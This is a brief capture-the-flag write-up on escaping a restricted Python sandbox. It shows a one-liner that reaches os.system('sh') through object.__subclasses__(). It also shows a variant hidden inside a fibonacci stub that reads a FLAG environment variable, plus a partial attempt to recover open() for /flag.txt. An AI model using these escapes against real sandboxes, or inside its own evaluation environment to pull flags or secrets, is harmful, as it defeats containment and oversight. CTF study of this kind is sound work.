29 lines
1.3 KiB
Plaintext
29 lines
1.3 KiB
Plaintext
Python sandbox blocks import etc.
|
|
|
|
From here: https://github.com/jailctf/pyjailbreaker
|
|
https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md
|
|
Commands like this one can get the os module and execute system:
|
|
[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')
|
|
|
|
The sandbox still bans keyword like system. So
|
|
def fibonacci(n):
|
|
# Your implementation here
|
|
os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
|
|
print(os_mod.getenv('FLAG'))
|
|
|
|
I tryed and found out that the FLAG is also set as environment variable and so I got it usig os.getenv('FLAG')
|
|
|
|
WORK IN PROGRESS
|
|
def fibonacci(n):
|
|
# Your implementation here
|
|
#for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
|
|
# if 'codecs.In' in str(cls):
|
|
# print(i, cls)
|
|
# break
|
|
INDEX=127
|
|
dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
|
|
print(dictglobals.keys())
|
|
op_en = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
|
|
#('/flag.txt','r')
|
|
#re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']
|